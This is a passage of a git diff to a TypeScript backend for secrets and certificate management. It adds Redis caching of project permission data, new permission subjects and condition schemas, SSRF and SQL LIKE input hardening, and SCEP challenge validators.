+299,107 @@ export const permissionServiceFactory = ({ }; }; + const reviveCachedPermissionDates = ( + memberships: { + roles?: { temporaryAccessEndTime?: string | Date | null }[]; + additionalPrivileges?: { temporaryAccessEndTime?: string | Date | null }[]; + }[] + ) => { + for (const membership of memberships) { + for (const role of membership.roles ?? []) { + if (role.temporaryAccessEndTime) { + role.temporaryAccessEndTime = new Date(role.temporaryAccessEndTime); + } + } + for (const priv of membership.additionalPrivileges ?? []) { + if (priv.temporaryAccessEndTime) { + priv.temporaryAccessEndTime = new Date(priv.temporaryAccessEndTime); + } + } + } + }; + + type TCachedProjectPermission = { + permissionData: Awaited>; + projectDetails: TProjects; + username: string; + canBypassSso: boolean; + }; + + const $fetchProjectPermissionData = async ( + projectId: string, + actorOrgId: string | undefined, + actionProjectType: ActionProjectType, + actor: ActorType.USER | ActorType.IDENTITY, + actorId: string + ): Promise => { + const projectDetails = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); + if (!projectDetails) { + throw new NotFoundError({ message: `Project with ${projectId} not found` }); + } + + if (projectDetails.orgId !== actorOrgId) { + throw new ForbiddenRequestError({ message: "This project does not belong to your selected organization." }); + } + + if (actionProjectType !== ActionProjectType.Any && actionProjectType !== projectDetails.type) { + throw new BadRequestError({ + message: `The project is of type ${projectDetails.type}. Operations of type ${actionProjectType} are not allowed.` + }); + } + + const permissionData = await permissionDAL.getPermission({ + scopeData: { + scope: AccessScope.Project, + orgId: projectDetails.orgId, + projectId + }, + actorId, + actorType: actor + }); + if (!permissionData?.length) + throw new ForbiddenRequestError({ + message: `You are not a member of this project with ID ${projectId}. Please assign this ${actor} to the project with the appropriate permissions, then try again.` + }); + + let username = ""; + if (actor === ActorType.USER) { + const userDetails = await userDAL.findById(actorId); + username = userDetails?.username ?? ""; + } else { + const identityDetails = await identityDAL.findById(actorId); + username = identityDetails?.name ?? ""; + } + + // SSO bypass check (for USER actors) β€” pre-compute and cache the boolean + let canBypassSso = false; + if (actor === ActorType.USER) { + const enforceSsoAndBypassEnabled = + permissionData?.[0].orgAuthEnforced || + (permissionData?.[0].orgGoogleSsoAuthEnforced && permissionData?.[0].bypassOrgAuthEnabled); + + if (enforceSsoAndBypassEnabled) { + const orgIdForBypass = permissionData?.[0].rootOrgId ?? projectDetails.orgId; + const orgPermissionData = await permissionDAL.getPermission({ + scopeData: { scope: AccessScope.Organization, orgId: orgIdForBypass }, + actorId, + actorType: ActorType.USER + }); + if (orgPermissionData?.length) { + const orgPermissionFromRoles = flattenActiveRolesFromMemberships(orgPermissionData, OrgMembershipRole.Custom); + const orgPermission = createMongoAbility(buildOrgPermissionRules(orgPermissionFromRoles), { + conditionsMatcher + }); + canBypassSso = orgPermission.can(OrgPermissionSsoActions.BypassSsoEnforcement, OrgPermissionSubjects.Sso); + } + } + } + + return { permissionData, projectDetails, username, canBypassSso }; + }; + const getProjectPermission: TPermissionServiceFactory["getProjectPermission"] = async ({ actor: inputActor, actorId: inputActorId, @@ -371,6 +411,10 @@ export const permissionServiceFactory = ({ let actor = inputActor; let actorId = inputActorId; + if (!actorOrgId) { + throw new BadRequestError({ message: "Organization context is required for project permission checks" }); + } + if (actor === ActorType.SERVICE) { return getServiceTokenProjectPermission({ serviceTokenId: actorId, @@ -397,9 +441,7 @@ export const permissionServiceFactory = ({ name: "Get org permission" }); } - - const projectPermissionActor: ActorType.USER | ActorType.IDENTITY = - actor === ActorType.USER ? ActorType.USER : ActorType.IDENTITY; + const narrowedActor: ActorType.USER | ActorType.IDENTITY = actor; // Request-scoped full-function memoization: identical permission checks within the same request const memoKey = requestMemoKeys.projectPermission({ @@ -419,79 +461,51 @@ export const permissionServiceFactory = ({ }; const loadProjectPermission = async (): Promise => { - // DAL-level memoization: deduplicates projectDAL.findById across services - // (permission service, getBotKey, KMS) within the same request. - const projectDetails = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => - projectDAL.findById(projectId) - ); - if (!projectDetails) { - throw new NotFoundError({ message: `Project with ${projectId} not found` }); - } + // Layer 2: Redis fingerprint cache (marker 10s + data 10m) + const cached: TCachedProjectPermission = await withCacheFingerprint({ + keyStore, + dataKey: KeyStorePrefixes.ProjectPermissionData(projectId, narrowedActor, actorId, actionProjectType), + markerKey: KeyStorePrefixes.ProjectPermissionMarker(projectId, narrowedActor, actorId, actionProjectType), + markerTtlSeconds: KeyStoreTtls.ProjectPermissionMarkerTtlSeconds, + dataTtlSeconds: KeyStoreTtls.ProjectPermissionDataTtlSeconds, + fingerprintFetcher: () => + permissionDAL.getPermissionFingerprint({ + projectId, + orgId: actorOrgId, + actorId, + actorType: narrowedActor + }), + dataFetcher: () => + $fetchProjectPermissionData(projectId, actorOrgId, actionProjectType, narrowedActor, actorId), + reviver: (parsed: TCachedProjectPermission) => { + reviveCachedPermissionDates(parsed.permissionData); + } + }); - const projectDetailsCtx = { - id: projectDetails.id, - name: projectDetails.name, - slug: projectDetails.slug - }; + const { permissionData, projectDetails, username, canBypassSso } = cached; if (projectDetails.orgId !== actorOrgId) { throw new ForbiddenRequestError({ message: "This project does not belong to your selected organization." }); } - if (actionProjectType !== ActionProjectType.Any && actionProjectType !== projectDetails.type) { throw new BadRequestError({ message: `The project is of type ${projectDetails.type}. Operations of type ${actionProjectType} are not allowed.` }); } - const permissionData = await permissionDAL.getPermission({ - scopeData: { - scope: AccessScope.Project, - orgId: projectDetails.orgId, - projectId - }, - actorId, - actorType: projectPermissionActor - }); - if (!permissionData?.length) - throw new ForbiddenRequestError({ - message: `You are not a member of this project with ID ${projectId}. Please assign this ${projectPermissionActor} to the project with the appropriate permissions, then try again.` - }); + const projectDetailsCtx = { + id: projectDetails.id, + name: projectDetails.name, + slug: projectDetails.slug + }; const permissionFromRoles = flattenActiveRolesFromMemberships(permissionData, ProjectMembershipRole.Custom); const hasRole = (role: string) => permissionData.some((memberships) => memberships.roles.some((el) => role === (el.customRoleSlug || el.role))); - // SSO enforcement applies only to users; use org-level bypass criteria (Org Admin or BypassSsoEnforcement permission) - // When project is in sub-org, use root org for bypass check (SSO enforced at root; user's bypass permission is in root org) + // SSO enforcement runs on every request (uses per-request actorAuthMethod, not cached) if (actor === ActorType.USER) { - let canBypassSso = false; - const enforceSsoAndBypassEnabled = - permissionData?.[0].orgAuthEnforced || - (permissionData?.[0].orgGoogleSsoAuthEnforced && permissionData?.[0].bypassOrgAuthEnabled); - - if (enforceSsoAndBypassEnabled) { - const orgIdForBypass = permissionData?.[0].rootOrgId ?? projectDetails.orgId; - const orgPermissionData = await permissionDAL.getPermission({ - scopeData: { scope: AccessScope.Organization, orgId: orgIdForBypass }, - actorId, - actorType: ActorType.USER - }); - if (orgPermissionData?.length) { - const orgPermissionFromRoles = flattenActiveRolesFromMemberships( - orgPermissionData, - OrgMembershipRole.Custom - ); - const orgPermission = createMongoAbility( - buildOrgPermissionRules(orgPermissionFromRoles), - { - conditionsMatcher - } - ); - canBypassSso = orgPermission.can(OrgPermissionSsoActions.BypassSsoEnforcement, OrgPermissionSubjects.Sso); - } - } validateOrgSSO( actorAuthMethod, permissionData?.[0].orgAuthEnforced, @@ -511,19 +525,6 @@ export const permissionServiceFactory = ({ const metadataKeyValuePair = escapeHandlebarsMissingDict(unescapedMetadata, "identity.metadata"); const identityPermissionMetadataCtx = { metadata: unescapedMetadata }; - let username = ""; - if (actor === ActorType.USER) { - const userDetails = await requestMemoize(requestMemoKeys.userFindById(actorId), () => - userDAL.findById(actorId) - ); - username = userDetails?.username; - } else { - const identityDetails = await requestMemoize(requestMemoKeys.identityFindById(actorId), () => - identityDAL.findById(actorId) - ); - username = identityDetails?.name; - } - const unescapedIdentityAuthInfo = requestContext.get(RequestContextKey.IdentityAuthInfo); const identityAuthInfo = unescapedIdentityAuthInfo?.identityId === actorId && unescapedIdentityAuthInfo @@ -563,6 +564,7 @@ export const permissionServiceFactory = ({ }; }; + // Layer 1: in-memory per-request memoization β†’ Layer 2: Redis fingerprint cache β†’ Layer 3: DB const payload = memoizer ? await memoizer.getOrSet(memoKey, loadProjectPermission) : await loadProjectPermission(); requestContext.set(RequestContextKey.ProjectDetails, payload.projectDetailsCtx); @@ -820,7 +822,6 @@ export const permissionServiceFactory = ({ getProjectPermissions, getOrgPermissionByRoles, getProjectPermissionByRoles, - checkGroupProjectPermission, - invalidateProjectPermissionCache + checkGroupProjectPermission }; }; diff --git a/backend/src/ee/services/permission/project-permission.ts b/backend/src/ee/services/permission/project-permission.ts index b9a54294ea6..e16b338d76b 100644 --- a/backend/src/ee/services/permission/project-permission.ts +++ b/backend/src/ee/services/permission/project-permission.ts @@ -248,6 +248,10 @@ export enum ProjectPermissionAuditLogsActions { Read = "read" } +export enum ProjectPermissionInsightsActions { + Read = "read" +} + export enum ProjectPermissionPamAccountActions { Access = "access", Read = "read", @@ -337,6 +341,7 @@ export enum ProjectPermissionSub { PkiSubscribers = "pki-subscribers", PkiAlerts = "pki-alerts", PkiCollections = "pki-collections", + CertificateInventoryViews = "certificate-inventory-views", Kms = "kms", Cmek = "cmek", SecretSyncs = "secret-syncs", @@ -352,6 +357,7 @@ export enum ProjectPermissionSub { AppConnections = "app-connections", PamFolders = "pam-folders", PamResources = "pam-resources", + PamDomains = "pam-domains", PamAccounts = "pam-accounts", PamSessions = "pam-sessions", PamAccountPolicies = "pam-account-policies", @@ -362,7 +368,8 @@ export enum ProjectPermissionSub { ApprovalRequestGrants = "approval-request-grants", McpEndpoints = "mcp-endpoints", McpServers = "mcp-servers", - McpActivityLogs = "mcp-activity-logs" + McpActivityLogs = "mcp-activity-logs", + Insights = "insights" } // Structure: { [subject]: { [action]: allowedConditionKeys[] } } @@ -522,9 +529,11 @@ export type McpEndpointSubjectFields = { }; export type PamAccountSubjectFields = { - resourceName: string; + resourceName?: string; + resourceType?: string; + domainName?: string; + domainType?: string; accountName: string; - resourceType: string; metadata?: { key: string; value: string }[]; }; @@ -534,6 +543,12 @@ export type PamResourceSubjectFields = { metadata?: { key: string; value: string }[]; }; +export type PamDomainSubjectFields = { + name: string; + domainType: string; + metadata?: { key: string; value: string }[]; +}; + export type ProjectPermissionSet = | [ ProjectPermissionSecretActions, @@ -635,6 +650,7 @@ export type ProjectPermissionSet = | [ProjectPermissionActions, ProjectPermissionSub.SshHostGroups] | [ProjectPermissionActions, ProjectPermissionSub.PkiAlerts] | [ProjectPermissionActions, ProjectPermissionSub.PkiCollections] + | [ProjectPermissionActions, ProjectPermissionSub.CertificateInventoryViews] | [ProjectPermissionKmipActions, ProjectPermissionSub.Kmip] | [ProjectPermissionCmekActions, ProjectPermissionSub.Cmek] | [ProjectPermissionActions.Delete, ProjectPermissionSub.Project] @@ -665,6 +681,10 @@ export type ProjectPermissionSet = ProjectPermissionActions, ProjectPermissionSub.PamResources | (ForcedSubject & PamResourceSubjectFields) ] + | [ + ProjectPermissionActions, + ProjectPermissionSub.PamDomains | (ForcedSubject & PamDomainSubjectFields) + ] | [ ProjectPermissionPamAccountActions, ProjectPermissionSub.PamAccounts | (ForcedSubject & PamAccountSubjectFields) @@ -694,7 +714,8 @@ export type ProjectPermissionSet = ] | [ProjectPermissionApprovalRequestActions, ProjectPermissionSub.ApprovalRequests] | [ProjectPermissionApprovalRequestGrantActions, ProjectPermissionSub.ApprovalRequestGrants] - | [ProjectPermissionSecretApprovalRequestActions, ProjectPermissionSub.SecretApprovalRequest]; + | [ProjectPermissionSecretApprovalRequestActions, ProjectPermissionSub.SecretApprovalRequest] + | [ProjectPermissionInsightsActions, ProjectPermissionSub.Insights]; const SECRET_PATH_MISSING_SLASH_ERR_MSG = "Invalid Secret Path; it must start with a '/'"; const SECRET_PATH_PERMISSION_OPERATOR_SCHEMA = z.union([ @@ -1256,6 +1277,28 @@ const PamAccountConditionSchema = z }) .partial() ]), + domainName: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + domainType: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), metadata: z.object({ [PermissionConditionOperators.$ELEMENTMATCH]: z .object({ @@ -1326,6 +1369,53 @@ const PamResourceConditionSchema = z }) .partial(); +const PamDomainConditionSchema = z + .object({ + name: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + domainType: z.union([ + z.string(), + z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN], + [PermissionConditionOperators.$GLOB]: PermissionConditionSchema[PermissionConditionOperators.$GLOB] + }) + .partial() + ]), + metadata: z.object({ + [PermissionConditionOperators.$ELEMENTMATCH]: z + .object({ + key: z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN] + }) + .partial(), + value: z + .object({ + [PermissionConditionOperators.$EQ]: PermissionConditionSchema[PermissionConditionOperators.$EQ], + [PermissionConditionOperators.$NEQ]: PermissionConditionSchema[PermissionConditionOperators.$NEQ], + [PermissionConditionOperators.$IN]: PermissionConditionSchema[PermissionConditionOperators.$IN] + }) + .partial() + }) + .partial() + }) + }) + .partial(); + const CertificateAuthorityConditionSchema = z .object({ name: z.union([ @@ -1517,6 +1607,12 @@ const GeneralPermissionSchema = [ "Describe what action an entity can take." ) }), + z.object({ + subject: z.literal(ProjectPermissionSub.Insights).describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionInsightsActions).describe( + "Describe what action an entity can take." + ) + }), z.object({ subject: z.literal(ProjectPermissionSub.IpAllowList).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( @@ -1563,6 +1659,14 @@ const GeneralPermissionSchema = [ "Describe what action an entity can take." ) }), + z.object({ + subject: z + .literal(ProjectPermissionSub.CertificateInventoryViews) + .describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( + "Describe what action an entity can take." + ) + }), z.object({ subject: z.literal(ProjectPermissionSub.PkiDiscovery).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionPkiDiscoveryActions).describe( @@ -1659,6 +1763,16 @@ const GeneralPermissionSchema = [ "When specified, only matching conditions will be allowed to access given resource." ).optional() }), + z.object({ + subject: z.literal(ProjectPermissionSub.PamDomains).describe("The entity this permission pertains to."), + inverted: z.boolean().optional().describe("Whether rule allows or forbids."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(ProjectPermissionActions).describe( + "Describe what action an entity can take." + ), + conditions: PamDomainConditionSchema.describe( + "When specified, only matching conditions will be allowed to access given domain." + ).optional() + }), z.object({ subject: z.literal(ProjectPermissionSub.PamAccounts).describe("The entity this permission pertains to."), inverted: z.boolean().optional().describe("Whether rule allows or forbids."), diff --git a/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts b/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts index 2649e0a1108..391578cbb12 100644 --- a/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts +++ b/backend/src/ee/services/pki-acme/pki-acme-challenge-service.ts @@ -1,14 +1,16 @@ import { resolve4, Resolver } from "node:dns/promises"; -import axios, { AxiosError } from "axios"; +import { AxiosError, isAxiosError } from "axios"; import { TPkiAcmeChallenges } from "@app/db/schemas/pki-acme-challenges"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { isValidIp } from "@app/lib/ip"; import { isPrivateIp } from "@app/lib/ip/ipRange"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { ActorType } from "@app/services/auth/auth-type"; import { EventType, TAuditLogServiceFactory } from "../audit-log/audit-log-types"; @@ -93,10 +95,14 @@ export const pkiAcmeChallengeServiceFactory = ({ // TODO: read config from the profile to get the timeout instead const timeoutMs = 10 * 1000; // 10 seconds + + // SSRF protection: resolve DNS and block private/local IP addresses + await blockLocalAndPrivateIpAddresses(challengeUrl.toString()); + // Notice: well, we are in a transaction, ideally we should not hold transaction and perform // a long running operation for long time. But assuming we are not performing a tons of // challenge validation at the same time, it should be fine. - const challengeResponse = await axios.get(challengeUrl.toString(), { + const challengeResponse = await request.get(challengeUrl.toString(), { // In case if we override the host in the development mode, still provide the original host in the header // to help the upstream server to validate the request headers: { @@ -175,7 +181,7 @@ export const pkiAcmeChallengeServiceFactory = ({ try { // Properly type and inspect the error - if (axios.isAxiosError(exp)) { + if (isAxiosError(exp)) { const axiosError = exp as AxiosError; const errorCode = axiosError.code; const errorMessage = axiosError.message; diff --git a/backend/src/ee/services/pki-acme/pki-acme-service.ts b/backend/src/ee/services/pki-acme/pki-acme-service.ts index 3e261efc8da..0712a8222fe 100644 --- a/backend/src/ee/services/pki-acme/pki-acme-service.ts +++ b/backend/src/ee/services/pki-acme/pki-acme-service.ts @@ -13,7 +13,7 @@ import { z, ZodError } from "zod"; import { TPkiAcmeOrders } from "@app/db/schemas"; import { TPkiAcmeAccounts } from "@app/db/schemas/pki-acme-accounts"; import { TPkiAcmeAuths } from "@app/db/schemas/pki-acme-auths"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -398,6 +398,7 @@ export const pkiAcmeServiceFactory = ({ switch (orderWithCertificateRequest.certificateRequest.status) { case CertificateRequestStatus.PENDING: case CertificateRequestStatus.PENDING_APPROVAL: + case CertificateRequestStatus.PENDING_VALIDATION: break; case CertificateRequestStatus.ISSUED: newStatus = AcmeOrderStatus.Valid; @@ -435,13 +436,8 @@ export const pkiAcmeServiceFactory = ({ await validateAcmeProfile(profileId); const nonce = crypto.randomBytes(32).toString("base64url"); const nonceKey = KeyStorePrefixes.PkiAcmeNonce(nonce); - await keyStore.setItemWithExpiry( - nonceKey, - // Expire in 5 minutes. - // TODO: read config from the profile to get the expiration time instead - 60 * 5, - nonce - ); + // TODO: read config from the profile to get the expiration time instead + await keyStore.setItemWithExpiry(nonceKey, KeyStoreTtls.PkiAcmeNonceInSeconds, nonce); return nonce; }; diff --git a/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts b/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts index ab36cea7e51..7e28bc851e4 100644 --- a/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts +++ b/backend/src/ee/services/pki-discovery/pki-certificate-installation-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiCertificateInstallations } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; export type TPkiCertificateInstallationDALFactory = ReturnType; @@ -100,14 +101,15 @@ export const pkiCertificateInstallationDALFactory = (db: TDbClient) => { } if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void query.andWhere((qb: Knex.QueryBuilder) => { void qb - .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${search}%`) + .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${sanitizedSearch}%`) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'hostname' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'ipAddress' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]); }); } @@ -166,14 +168,15 @@ export const pkiCertificateInstallationDALFactory = (db: TDbClient) => { } if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void query.andWhere((qb: Knex.QueryBuilder) => { void qb - .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${search}%`) + .whereILike(`${TableName.PkiCertificateInstallation}.name`, `%${sanitizedSearch}%`) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'hostname' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]) .orWhereRaw(`"${TableName.PkiCertificateInstallation}"."locationDetails"->>'ipAddress' ILIKE ?`, [ - `%${search}%` + `%${sanitizedSearch}%` ]); }); } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts b/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts index acd6bd2aa73..a80c3546efb 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-config-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiDiscoveryConfigs } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { PkiDiscoveryScanStatus } from "./pki-discovery-types"; @@ -51,8 +52,9 @@ export const pkiDiscoveryConfigDALFactory = (db: TDbClient) => { .limit(limit); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); query = query.andWhere((qb) => { - void qb.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void qb.whereILike("name", `%${sanitizedSearch}%`).orWhereILike("description", `%${sanitizedSearch}%`); }); } @@ -68,8 +70,9 @@ export const pkiDiscoveryConfigDALFactory = (db: TDbClient) => { let query = (tx || db.replicaNode())(TableName.PkiDiscoveryConfig).where({ projectId }).count("id").first(); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); query = query.andWhere((qb) => { - void qb.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void qb.whereILike("name", `%${sanitizedSearch}%`).orWhereILike("description", `%${sanitizedSearch}%`); }); } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts b/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts index 8cdcd0429a7..5caa62b9896 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-fns.ts @@ -103,18 +103,23 @@ export const validateTargetConfig = ( const singleIps = ipRanges.filter((r) => !r.includes("/")); if (shouldBlockPrivateIps(!!hasGateway)) { + const appCfg = getConfig(); + const selfHostedHint = appCfg.isCloud + ? "" + : " If you are self-hosting, you can alternatively set the 'ALLOW_INTERNAL_IP_CONNECTIONS' environment variable to 'true' on your instance to scan private networks without a gateway."; + const privateIp = singleIps.find((ip) => isPrivateIp(ip)); if (privateIp) { return { valid: false, - error: "Private/internal IP addresses require a gateway. Use a gateway to scan private networks." + error: `Private/internal IP addresses require a gateway. Use a gateway to scan private networks.${selfHostedHint}` }; } const privateCidr = cidrRanges.find((cidr) => isPrivateIp(cidr.split("/")[0])); if (privateCidr) { return { valid: false, - error: "Private/internal CIDR ranges require a gateway. Use a gateway to scan private networks." + error: `Private/internal CIDR ranges require a gateway. Use a gateway to scan private networks.${selfHostedHint}` }; } } diff --git a/backend/src/ee/services/pki-discovery/pki-discovery-service.ts b/backend/src/ee/services/pki-discovery/pki-discovery-service.ts index 748b0ba632f..561f5777b73 100644 --- a/backend/src/ee/services/pki-discovery/pki-discovery-service.ts +++ b/backend/src/ee/services/pki-discovery/pki-discovery-service.ts @@ -8,7 +8,6 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TGatewayV2DALFactory } from "../gateway-v2/gateway-v2-dal"; import { TPkiDiscoveryConfigDALFactory } from "./pki-discovery-config-dal"; @@ -46,7 +45,6 @@ type TPkiDiscoveryServiceFactoryDep = { TPkiDiscoveryScanHistoryDALFactory, "findLatestByDiscoveryId" | "findByDiscoveryId" | "countByDiscoveryId" >; - projectDAL: Pick; permissionService: Pick; gatewayV2DAL: Pick; queuePkiDiscoveryScan: (discoveryId: string) => Promise; @@ -71,7 +69,6 @@ const validateTargetConfigForType = (discoveryType: PkiDiscoveryType, config: TP export const pkiDiscoveryServiceFactory = ({ pkiDiscoveryConfigDAL, pkiDiscoveryScanHistoryDAL, - projectDAL, permissionService, gatewayV2DAL, queuePkiDiscoveryScan @@ -104,11 +101,6 @@ export const pkiDiscoveryServiceFactory = ({ ProjectPermissionSub.PkiDiscovery ); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); - } - const existingCount = await pkiDiscoveryConfigDAL.countByProjectId(projectId); if (existingCount >= MAX_DISCOVERIES_PER_PROJECT) { throw new BadRequestError({ diff --git a/backend/src/ee/services/pki-scep/challenge/index.ts b/backend/src/ee/services/pki-scep/challenge/index.ts new file mode 100644 index 00000000000..a327cc0ddb6 --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/index.ts @@ -0,0 +1,29 @@ +import { BadRequestError } from "@app/lib/errors"; +import { TScepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; + +import { TScepDynamicChallengeDALFactory } from "../pki-scep-dynamic-challenge-dal"; +import { dynamicChallengeValidator } from "./scep-challenge-dynamic"; +import { staticChallengeValidator } from "./scep-challenge-static"; +import { IScepChallengeValidator, ScepChallengeType } from "./scep-challenge-types"; + +export type { IScepChallengeValidator } from "./scep-challenge-types"; +export { ScepChallengeType } from "./scep-challenge-types"; + +type TScepChallengeValidatorFactoryDep = { + scepEnrollmentConfigDAL: Pick; + scepDynamicChallengeDAL: Pick; +}; + +export const getScepChallengeValidator = ( + challengeType: ScepChallengeType, + deps: TScepChallengeValidatorFactoryDep +): IScepChallengeValidator => { + switch (challengeType) { + case ScepChallengeType.DYNAMIC: + return dynamicChallengeValidator({ scepDynamicChallengeDAL: deps.scepDynamicChallengeDAL }); + case ScepChallengeType.STATIC: + return staticChallengeValidator({ scepEnrollmentConfigDAL: deps.scepEnrollmentConfigDAL }); + default: + throw new BadRequestError({ message: `Unsupported SCEP challenge type: ${String(challengeType)}` }); + } +}; diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts b/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts new file mode 100644 index 00000000000..c7c636adf78 --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-dynamic.ts @@ -0,0 +1,21 @@ +import { crypto } from "@app/lib/crypto/cryptography"; + +import { TScepDynamicChallengeDALFactory } from "../pki-scep-dynamic-challenge-dal"; +import { IScepChallengeValidator } from "./scep-challenge-types"; + +type TDynamicChallengeValidatorDep = { + scepDynamicChallengeDAL: Pick; +}; + +export const dynamicChallengeValidator = ({ + scepDynamicChallengeDAL +}: TDynamicChallengeValidatorDep): IScepChallengeValidator => ({ + validate: async (challengePassword: string, scepConfigId: string): Promise => { + if (!challengePassword) return false; + + const hashedChallenge = crypto.nativeCrypto.createHash("sha256").update(challengePassword).digest("hex"); + const claimed = await scepDynamicChallengeDAL.consumeByHash(hashedChallenge, scepConfigId); + + return !!claimed; + } +}); diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts b/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts new file mode 100644 index 00000000000..538842d40da --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-static.ts @@ -0,0 +1,21 @@ +import { crypto } from "@app/lib/crypto/cryptography"; +import { TScepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; + +import { IScepChallengeValidator } from "./scep-challenge-types"; + +type TStaticChallengeValidatorDep = { + scepEnrollmentConfigDAL: Pick; +}; + +export const staticChallengeValidator = ({ + scepEnrollmentConfigDAL +}: TStaticChallengeValidatorDep): IScepChallengeValidator => ({ + validate: async (challengePassword: string, scepConfigId: string): Promise => { + if (!challengePassword) return false; + + const scepConfig = await scepEnrollmentConfigDAL.findById(scepConfigId); + if (!scepConfig?.hashedChallengePassword) return false; + + return crypto.hashing().compareHash(challengePassword, scepConfig.hashedChallengePassword); + } +}); diff --git a/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts 